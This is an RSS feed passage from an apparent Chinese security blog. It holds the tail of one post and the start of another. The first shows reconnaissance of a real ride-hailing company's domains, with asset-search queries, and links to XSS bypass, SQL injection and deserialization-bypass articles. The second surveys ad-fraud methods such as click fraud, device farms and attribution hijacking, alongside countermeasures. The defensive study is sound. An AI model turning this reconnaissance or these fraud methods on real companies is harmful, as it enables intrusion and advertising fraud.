  &quot;didistatic.com&quot;,
  &quot;kuaidadi.com&quot;,
  &quot;diditaxi.com.cn&quot;,
  &quot;udache.com&quot;,
  &quot;xiaojukeji.com&quot;,
  &quot;zhonganfengshang.com&quot;,
  &quot;didimobility.com&quot;,
  &quot;didiglobal.com&quot;,
  &quot;didi.cn&quot;,
  &quot;qingqikeji.com&quot;,
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;https://fofa.info/result?qbase64=ZG9tYWluPSJ4aWFvanVjaGVmdS5jb20i
https://fofa.info/result?qbase64=ZG9tYWluPSJkaWRpY2h1eGluZy5jb20i&amp;amp;page=1&amp;amp;page_size=50
https://pnas.fun:50443/taskList/taskDetail?task_id=67c698500b91fc24036f0afc&amp;amp;targetName=xiaojuchefu.com&amp;amp;site_cnt=37&amp;amp;domain_cnt=20&amp;amp;ip_cnt=15&amp;amp;cert_cnt=0&amp;amp;service_cnt=0&amp;amp;fileleak_cnt=0&amp;amp;url_cnt=0&amp;amp;vuln_cnt=0&amp;amp;npoc_service_cnt=0&amp;amp;cip_cnt=6&amp;amp;nuclei_result_cnt=0&amp;amp;stat_finger_cnt=2&amp;amp;wih_cnt=0&lt;/p&gt;
&lt;h2&gt;参考文献&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.secpulse.com/archives/author/jdsec/page/2&quot;&gt;京东SRC文章列表&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cnblogs.com/zha0gongz1/p/12732356.html&quot;&gt;绕过XSS过滤姿势总结&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/smxiazi/xia_sql&quot;&gt;smxiazi/xia_sql&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/whwlsfb/Log4j2Scan&quot;&gt;whwlsfb/Log4j2Scan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cnblogs.com/tysec/p/17375195.html&quot;&gt;渗透三大件：Burp插件安装&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://yang1k.github.io/post/sql%E6%B3%A8%E5%85%A5%E4%B9%8Border-by%E6%B3%A8%E5%85%A5/&quot;&gt;sql注入之order by注入&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.ascotbe.com/2020/07/24/XXE/&quot;&gt;XXE的一些利用方式&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://research.qianxin.com/archives/2014&quot;&gt;【BlackHat 2024】SystemUI As EvilPiP: 针对现代移动设备的劫持攻击&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://xz.aliyun.com/news/2046?time__1311=eqfx97DtGQitD%3DD%2FD0e5GkzTuwQvozoF4D&amp;amp;u_atoken=0375d39e37605df2f3bebe83ab6eff26&amp;amp;u_asig=1a0c39a017406450086375739e00d4&quot;&gt;Bundle风水——Android序列化与反序列化不匹配漏洞详解&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://xz.aliyun.com/news/16806?u_atoken=fc5695b7997bceb9b789f7b37cbc70f9&amp;amp;u_asig=ac11000117406332283236808e004e&quot;&gt;fastjson高版本二次反序列化绕过&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>业务安全之反爬对抗</title><link>https://picoorg.github.io/posts/%E4%B8%9A%E5%8A%A1%E5%AE%89%E5%85%A8%E4%B9%8B%E5%8F%8D%E7%88%AC%E5%AF%B9%E6%8A%97/</link><guid isPermaLink="true">https://picoorg.github.io/posts/%E4%B8%9A%E5%8A%A1%E5%AE%89%E5%85%A8%E4%B9%8B%E5%8F%8D%E7%88%AC%E5%AF%B9%E6%8A%97/</guid><pubDate>Fri, 21 Feb 2025 00:00:00 GMT</pubDate><content:encoded/></item><item><title>业务安全之广告反作弊</title><link>https://picoorg.github.io/posts/%E4%B8%9A%E5%8A%A1%E5%AE%89%E5%85%A8%E4%B9%8B%E5%B9%BF%E5%91%8A%E5%8F%8D%E4%BD%9C%E5%BC%8A/</link><guid isPermaLink="true">https://picoorg.github.io/posts/%E4%B8%9A%E5%8A%A1%E5%AE%89%E5%85%A8%E4%B9%8B%E5%B9%BF%E5%91%8A%E5%8F%8D%E4%BD%9C%E5%BC%8A/</guid><description>未知攻，焉知防，本文以攻击者视角展开分析业务安全广告反作弊基础内容。</description><pubDate>Fri, 21 Feb 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;1. 广告反作弊&lt;/h1&gt;
&lt;p&gt;广告（英语：advertising或advertizing），从狭义上讲是一种市场营销行为，用于劝说阅听人，通常以引发产品或服务购买，即商业广告。另一方面从广义上认识广告，它是一切为了沟通信息、促进认识的广告传播活动，无论是否作用于商业领域，是否将营利作为运作目标，只要具备广告的基本特征，都是广告活动。&lt;/p&gt;
&lt;h2&gt;1.1. 互联网广告行业分析&lt;/h2&gt;
&lt;h3&gt;1.1.1. 互联网广告产业链全景&lt;/h3&gt;
&lt;p&gt;一般情况需求流向如下：&lt;/p&gt;
&lt;p&gt;广告主 → 代理商策略团队 → 需求方平台（DSP） → 广告交易平台（ADX） → 供应方平台（SSP） → 媒体平台 → 受众用户&lt;/p&gt;
&lt;p&gt;而流量流向刚好相反&lt;/p&gt;
&lt;p&gt;用户 → 媒体平台 → SSP → ADX → DSP → 代理商/广告主 → 广告展示&lt;/p&gt;
&lt;h3&gt;1.1.2. 角色&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;分类&lt;/th&gt;
&lt;th&gt;角色名称（中文）&lt;/th&gt;
&lt;th&gt;英文名称（缩写）&lt;/th&gt;
&lt;th&gt;定义与职能&lt;/th&gt;
&lt;th&gt;典型代表/示例&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;核心参与方&lt;/td&gt;
&lt;td&gt;广告主&lt;/td&gt;
&lt;td&gt;Advertiser&lt;/td&gt;
&lt;td&gt;产品或服务的提供方，承担广告费用并追求营销效果，如品牌曝光、销售转化。&lt;/td&gt;
&lt;td&gt;京东、宝洁、特斯拉&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;广告代理商&lt;/td&gt;
&lt;td&gt;Advertising Agency&lt;/td&gt;
&lt;td&gt;连接广告主与媒体的中介，提供策略制定、资源采购、投放优化等代理服务。&lt;/td&gt;
&lt;td&gt;阳狮集团、电通安吉斯&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;需求方平台&lt;/td&gt;
&lt;td&gt;Demand-Side Platform (DSP)&lt;/td&gt;
&lt;td&gt;程序化广告中供广告主/代理商集中采买流量的平台，支持跨ADX实时竞价与精准定向。&lt;/td&gt;
&lt;td&gt;Google DV360、The Trade Desk&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;供应方平台&lt;/td&gt;
&lt;td&gt;Supply-Side Platform (SSP)&lt;/td&gt;
&lt;td&gt;程序化广告中供媒体管理并自动化售卖广告库存的平台，优化流量收益。&lt;/td&gt;
&lt;td&gt;PubMatic、Google Ad Manager&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;广告交易平台&lt;/td&gt;
&lt;td&gt;Ad Exchange (ADX)&lt;/td&gt;
&lt;td&gt;连接DSP与SSP的实时竞价交易市场，通过RTB协议完成广告位匹配。&lt;/td&gt;
&lt;td&gt;腾讯优量汇、Google ADX&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;媒体平台&lt;/td&gt;
&lt;td&gt;Media Platform&lt;/td&gt;
&lt;td&gt;承载广告曝光的流量场景，直接触达用户，可能自营广告平台或接入SSP。&lt;/td&gt;
&lt;td&gt;抖音、微信朋友圈、YouTube&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;广告主内部团队&lt;/td&gt;
&lt;td&gt;市场部&lt;/td&gt;
&lt;td&gt;Marketing Department&lt;/td&gt;
&lt;td&gt;制定品牌策略、预算分配及整体营销目标。&lt;/td&gt;
&lt;td&gt;联合利华市场部、小米品牌团队&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;广告投放团队&lt;/td&gt;
&lt;td&gt;Ad Operations Team&lt;/td&gt;
&lt;td&gt;负责广告账户管理、素材测试、效果优化等执行工作。&lt;/td&gt;
&lt;td&gt;美团效果广告优化团队&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;代理商团队&lt;/td&gt;
&lt;td&gt;代理商策略团队&lt;/td&gt;
&lt;td&gt;Agency Strategy Team&lt;/td&gt;
&lt;td&gt;提供媒介策略、竞品分析及投放效果预估，隶属于代理商。&lt;/td&gt;
&lt;td&gt;奥美媒介策略组&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;代理商执行团队&lt;/td&gt;
&lt;td&gt;Agency Execution Team&lt;/td&gt;
&lt;td&gt;负责广告账户搭建、数据监控与日常优化操作，隶属于代理商。&lt;/td&gt;
&lt;td&gt;电通安吉斯优化团队&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;创意与内容方&lt;/td&gt;
&lt;td&gt;广告创意公司&lt;/td&gt;
&lt;td&gt;Creative Agency&lt;/td&gt;
&lt;td&gt;设计并制作广告素材，如图文、视频、H5等，部分归属代理商或独立运营。&lt;/td&gt;
&lt;td&gt;Wieden+Kennedy、HAVAS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;技术&amp;amp;数据服务方&lt;/td&gt;
&lt;td&gt;广告监测公司&lt;/td&gt;
&lt;td&gt;Ad Verification &amp;amp; Monitoring&lt;/td&gt;
&lt;td&gt;监测广告曝光、点击、转化数据，提供反作弊及效果归因分析。&lt;/td&gt;
&lt;td&gt;秒针系统、AppsFlyer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;三方数据公司&lt;/td&gt;
&lt;td&gt;Third-Party Data Provider&lt;/td&gt;
&lt;td&gt;提供用户行为数据、行业洞察或ID打通服务，辅助精准定向。&lt;/td&gt;
&lt;td&gt;神策数据、TalkingData&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;独立软件供应商&lt;/td&gt;
&lt;td&gt;Independent Software Vendor (ISV)&lt;/td&gt;
&lt;td&gt;开发广告投放工具，如创意自动化、CDP系统，提供技术解决方案。&lt;/td&gt;
&lt;td&gt;筷子科技、Convertlab&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;终端相关方&lt;/td&gt;
&lt;td&gt;受众用户&lt;/td&gt;
&lt;td&gt;Target Audience&lt;/td&gt;
&lt;td&gt;广告内容的接收者，其行为数据直接影响广告优化方向。&lt;/td&gt;
&lt;td&gt;消费者、B端决策者&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;友商&lt;/td&gt;
&lt;td&gt;Competitor/Peer Brand&lt;/td&gt;
&lt;td&gt;同行业竞争品牌，其广告策略影响市场格局。&lt;/td&gt;
&lt;td&gt;可口可乐 vs 百事可乐&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;电商履约协作方&lt;/td&gt;
&lt;td&gt;商家&lt;/td&gt;
&lt;td&gt;Merchant&lt;/td&gt;
&lt;td&gt;电商场景中承接广告转化的销售终端，可能与广告主为同一实体。&lt;/td&gt;
&lt;td&gt;天猫旗舰店、Shopify独立站&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;物流&lt;/td&gt;
&lt;td&gt;Logistics Provider&lt;/td&gt;
&lt;td&gt;电商广告中负责商品配送的协作方，间接影响用户体验，通常不参与广告链路。&lt;/td&gt;
&lt;td&gt;顺丰、DHL&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;1.1.3. 媒介&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;平台：管理端、电商、直播间、搜索引擎、AI、ISV、导航站、第三方导购&lt;/li&gt;
&lt;li&gt;应用：浏览器、浏览器插件、浏览器插件脚本、快应用、重打包应用、木马病毒、第三方工具、第三方SDK、黑产内部软件&lt;/li&gt;
&lt;li&gt;特权：OEM应用、负一屏、输入法、辅助功能、Launcher、权限管理、安装管理、推送服务&lt;/li&gt;
&lt;li&gt;端：iOS、Android、IoT、Windows、Linux、Mac&lt;/li&gt;
&lt;li&gt;系统：AOSP对应OEM版本&lt;/li&gt;
&lt;li&gt;硬件：OEM的各类硬件及驱动&lt;/li&gt;
&lt;li&gt;网络：路由器、DNS服务器&lt;/li&gt;
&lt;li&gt;线下：门店拉新&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;1.1.4. 计费模式&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;计费类型&lt;/th&gt;
&lt;th&gt;出价点&lt;/th&gt;
&lt;th&gt;Ecpm计算公式&lt;/th&gt;
&lt;th&gt;计费点&lt;/th&gt;
&lt;th&gt;适用场景&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CPM&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;展示&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bid&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;展示&lt;/td&gt;
&lt;td&gt;品牌曝光（如开屏广告）&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CPC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;点击&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bid*Ectr&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;点击&lt;/td&gt;
&lt;td&gt;效果广告（如搜索广告）&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CPA&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;转化&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bid*Ectr*Ecvr&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;转化&lt;/td&gt;
&lt;td&gt;深度转化目标（如App安装）&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;oCPC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;转化&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bid*Ectr*Ecvr&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;点击&lt;/td&gt;
&lt;td&gt;平衡成本与效果（如电商ROI优化）&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;oCPM&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;转化&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bid*Ectr*Ecvr&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;投放&lt;/td&gt;
&lt;td&gt;兼顾曝光与转化（如信息流广告）&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Ecpm本质：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;公式：&lt;code&gt;Ecpm = 1000 × bid × Ectr × Ecvr&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;意义：媒体通过预估点击率（&lt;code&gt;Ectr&lt;/code&gt;）和转化率（&lt;code&gt;Ecvr&lt;/code&gt;），将不同计费类型（&lt;code&gt;CPC/CPA&lt;/code&gt;）统一为千次展示收益，确保广告排序公平性。&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;oCPX&lt;/code&gt;模式设计逻辑：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;解决痛点：
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;CPM/CPC&lt;/code&gt;：广告主成本不可控（如高曝光低转化）。&lt;/li&gt;
&lt;li&gt;&lt;code&gt;CPA&lt;/code&gt;：媒体收益风险（广告主可能隐瞒转化数据）。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;平衡机制：
&lt;ul&gt;
&lt;li&gt;广告主按转化出价，媒体按点击（&lt;code&gt;oCPC&lt;/code&gt;）或展示（&lt;code&gt;oCPM&lt;/code&gt;）计费。&lt;/li&gt;
&lt;li&gt;媒体通过历史数据预估&lt;code&gt;Ectr/Ecvr&lt;/code&gt;，保证自身收益；广告主需回传真实转化数据以优化模型，否则&lt;code&gt;Ecpm&lt;/code&gt;竞争力下降。&lt;/li&gt;
&lt;li&gt;广告主在已经被收费的前提下，若少传数据反而会影响自身广告的竞争力，也就没有了作弊动机。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;计费点与出价点的分离：
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;oCPC&lt;/code&gt;：计费点为点击，但出价基于转化，迫使广告主优化落地页体验（提高&lt;code&gt;Ecvr&lt;/code&gt;）。&lt;/li&gt;
&lt;li&gt;&lt;code&gt;oCPM&lt;/code&gt;：计费点为展示，但出价基于转化，驱动媒体优化流量匹配（提高&lt;code&gt;Ectr&lt;/code&gt;与&lt;code&gt;Ecvr&lt;/code&gt;）。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;指标说明：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;bid&lt;/code&gt;：出价&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Ectr&lt;/code&gt;：媒体预估点击率&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Ecvr&lt;/code&gt;：媒体预估转化率&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;1.1.5. 广告竞价机制&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;维度&lt;/th&gt;
&lt;th&gt;广义第一价格（&lt;code&gt;GFP&lt;/code&gt;）&lt;/th&gt;
&lt;th&gt;广义第二价格（&lt;code&gt;GSP&lt;/code&gt;）&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;竞价规则&lt;/td&gt;
&lt;td&gt;出价最高者赢得广告位，按自身出价支付费用，&lt;code&gt;P=自身bid&lt;/code&gt;。&lt;/td&gt;
&lt;td&gt;出价最高者赢得广告位，按次高出价+最小单位支付费用，&lt;code&gt;P=次高bid+Δ&lt;/code&gt;。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;广告主动机&lt;/td&gt;
&lt;td&gt;易引发非理性抬价，为争第一盲目提高&lt;code&gt;bid&lt;/code&gt;。&lt;/td&gt;
&lt;td&gt;鼓励按真实估值出价，支付价与自身&lt;code&gt;bid&lt;/code&gt;无关。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;生态健康性&lt;/td&gt;
&lt;td&gt;价格泡沫风险高，长期损害平台与广告主利益。&lt;/td&gt;
&lt;td&gt;抑制投机行为，提升竞价效率与生态稳定性。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;行业应用&lt;/td&gt;
&lt;td&gt;早期广告平台（如部分&lt;code&gt;DSP&lt;/code&gt;）&lt;/td&gt;
&lt;td&gt;主流媒体（&lt;code&gt;Google&lt;/code&gt;、&lt;code&gt;Meta&lt;/code&gt;、抖音广告平台）&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;GSP的深层优势&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;激励真实出价：广告主无需猜测对手策略，只需根据自身转化价值（如&lt;code&gt;LTV&lt;/code&gt;, &lt;code&gt;Lifetime Value&lt;/code&gt;）合理出价。&lt;/li&gt;
&lt;li&gt;抑制价格战：&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;GFP&lt;/code&gt;中，广告主可能为争排名持续提高&lt;code&gt;bid&lt;/code&gt;，最终导致&lt;code&gt;CPM&lt;/code&gt;虚高、广告主亏损、媒体流量价值透支（如早期&lt;code&gt;RTB&lt;/code&gt;市场乱象）。&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GSP&lt;/code&gt;通过“支付次高价”机制，自动平衡广告主收益与成本。&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;提升平台收益：表面看&lt;code&gt;GSP&lt;/code&gt;单次收入低于&lt;code&gt;GFP&lt;/code&gt;，但长期因生态健康带来更多广告主留存与预算增长。&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;GSP&lt;/code&gt;的变体与优化&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;VCG拍卖（&lt;code&gt;Vickrey-Clarke-Groves&lt;/code&gt;）&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;更复杂的“第二价格”机制，胜出者支付其对其他参与者造成的损失（理论上能实现绝对真实出价）。&lt;/li&gt;
&lt;li&gt;缺点：计算复杂度高，难以在实时广告交易中应用。&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;混合&lt;code&gt;GSP&lt;/code&gt;（&lt;code&gt;Hybrid GSP&lt;/code&gt;）&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;引入质量分（&lt;code&gt;Quality Score&lt;/code&gt;）加权，&lt;code&gt;Ecpm = bid × 质量分&lt;/code&gt;，胜出者按加权后的次高&lt;code&gt;Ecpm&lt;/code&gt;支付。&lt;/li&gt;
&lt;li&gt;应用：&lt;code&gt;Google广告排名= bid × 质量分&lt;/code&gt;，&lt;code&gt;支付价= (次高Ecpm / 自身质量分) + Δ&lt;/code&gt;。&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;1.2. 广告作弊发展历程&lt;/h2&gt;
&lt;p&gt;广告作弊与互联网广告技术同步演进，其发展历程可划分为技术试探期、规模化灰产期、智能化对抗期三大阶段。&lt;/p&gt;
&lt;h3&gt;1.2.1. 技术试探期：PC互联网时代（2000-2010）&lt;/h3&gt;
&lt;p&gt;互联网广告形式以网页横幅广告、搜索广告为主，计费模式多为 CPM/CPC，监测技术薄弱依赖服务端日志统计点击量。&lt;/p&gt;
&lt;p&gt;主要作弊手段包括：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;点击欺诈（Click Fraud），手动重复点击广告、编写简单脚本模拟点击。&lt;/li&gt;
&lt;li&gt;PC流量劫持，通过恶意软件篡改用户浏览器主页，强制跳转广告链接。&lt;/li&gt;
&lt;li&gt;人工刷单：雇佣“羊毛党”虚假下单，获取佣金后取消订单（电商）或退货（实物商品）。&lt;/li&gt;
&lt;li&gt;批量注册：编写脚本自动填写表单，生成无效用户（如游戏假量、教育行业假线索）。&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;反制措施：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;IP黑名单&lt;/li&gt;
&lt;li&gt;点击频率限制&lt;/li&gt;
&lt;li&gt;CAPTCHA验证&lt;/li&gt;
&lt;li&gt;JavaScript监测代码&lt;/li&gt;
&lt;li&gt;手机号/邮箱验证码校验&lt;/li&gt;
&lt;li&gt;订单有效性规则（如付款成功才计为CPS转化）&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;1.2.2. 规模化灰产期：移动互联网爆发期（2011-2018）&lt;/h3&gt;
&lt;p&gt;移动端广告崛起，信息流广告、激励视频成为主流，计费模式扩展至oCPX。&lt;/p&gt;
&lt;p&gt;主要作弊手段包括：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;机刷/设备农场，利用群控设备配合自动化脚本，同步操控数百台真机，模拟下载、注册、支付等行为。&lt;/li&gt;
&lt;li&gt;设备ID撞库，通过改机工具伪造设备参数，生成海量虚拟设备ID骗取激活奖励。&lt;/li&gt;
&lt;li&gt;归因劫持：监听用户安装行为（如Android广播&lt;code&gt;PACKAGE_ADDED&lt;/code&gt;），伪造归因数据。&lt;/li&gt;
&lt;li&gt;API劫持：破解电商App的SDK或API，伪造订单数据回传给广告平台。&lt;/li&gt;
&lt;li&gt;联盟作弊：流量渠道劫持自然流量，通过添加推广链接“冒领”佣金。&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;反制措施：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;设备指纹技术（采集MAC地址、IMEI、硬件参数、传感器数据识别模拟器）。&lt;/li&gt;
&lt;li&gt;归因窗口期调整（如“最终点击归因”改为“多触点归因”，激活后7天内转化才计费）。&lt;/li&gt;
&lt;li&gt;第三方监测平台崛起（AppsFlyer、Adjust提供反作弊报表）。&lt;/li&gt;
&lt;li&gt;数据一致性校验（对比广告平台与广告主后台的订单ID）。&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;1.2.3. 智能化对抗阶段：深度伪造与生态合谋（2019-至今）&lt;/h3&gt;
&lt;p&gt;在数字广告市场，程序化广告占数字广告收入占比从2017年的71%一路攀升到2022年的90%左右，到2027年，预计92%的数字广告收入将来自程序化广告。RTB实时竞价、DSP/SSP成为基础设施，广告主需求向深度转化（ROAS、LTV）迁移，反作弊进入算法对抗时代。&lt;/p&gt;
&lt;p&gt;新型作弊威胁：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;深度伪造流量（Deep Fake Traffic）：使用GAN生成虚假用户行为数据，绕过基于规则的检测。&lt;/li&gt;
&lt;li&gt;联盟作弊（Affiliate Fraud）：勾结流量渠道伪造转化，利用分成机制套取广告主预算。&lt;/li&gt;
&lt;li&gt;自然流量劫持：通过木马程序或浏览器插件，将用户原本的直接访问流量替换为带推广参数的链接。&lt;/li&gt;
&lt;li&gt;供应链合谋：数字化广告全链路上多角色合谋参与作弊并分佣。&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;反制技术前沿：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;无监督学习：通过聚类分析识别异常流量模式（如点击时间分布、设备集群行为）。&lt;/li&gt;
&lt;li&gt;图神经网络（GNN）：构建用户-设备-IP关系图谱，检测协同作弊网络。&lt;/li&gt;
&lt;li&gt;行为生物识别：分析用户操作轨迹（点击速度、滑动模式）区分人机。&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;1.2.4. 广告灰黑产未来趋势 - AI驱动的攻防升级&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;攻击侧：
&lt;ul&gt;
&lt;li&gt;利用大语言模型（LLM）生成更自然的用户行为轨迹。&lt;/li&gt;
&lt;li&gt;结合物联网设备（智能电视、车载系统）劫持家庭场景流量。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;防御侧：
&lt;ul&gt;
&lt;li&gt;联邦学习：跨平台联合建模，打破数据孤岛识别跨渠道作弊。&lt;/li&gt;
&lt;li&gt;边缘计算实时风控：在用户设备端实时拦截可疑请求。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;2. 方法论与案例 - 攻击者模型&lt;/h1&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Procedure&lt;/th&gt;
&lt;th&gt;提前掌握用户意图&lt;/th&gt;
&lt;th&gt;特征&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;劫持&lt;/td&gt;
&lt;td&gt;CPA归因劫持&lt;/td&gt;
&lt;td&gt;网络劫持/客户端劫持&lt;/td&gt;
&lt;td&gt;否&lt;/td&gt;
&lt;td&gt;CVR极高&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;劫持&lt;/td&gt;
&lt;td&gt;CPA归因劫持&lt;/td&gt;
&lt;td&gt;站内劫持/渠道包劫持&lt;/td&gt;
&lt;td&gt;是&lt;/td&gt;
&lt;td&gt;CVR极高，流量来源为自身&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;劫持&lt;/td&gt;
&lt;td&gt;CPC点击劫持&lt;/td&gt;
&lt;td&gt;广告堆叠点击/浏览点击&lt;/td&gt;
&lt;td&gt;否&lt;/td&gt;
&lt;td&gt;CTR极高，CVR极低&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;劫持&lt;/td&gt;
&lt;td&gt;CPS实时归因劫持&lt;/td&gt;
&lt;td&gt;网络劫持/客户端劫持&lt;/td&gt;
&lt;td&gt;否&lt;/td&gt;
&lt;td&gt;CVR极高，转链到点击时间极短&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;劫持&lt;/td&gt;
&lt;td&gt;CPS离线归因劫持&lt;/td&gt;
&lt;td&gt;站内劫持&lt;/td&gt;
&lt;td&gt;是&lt;/td&gt;
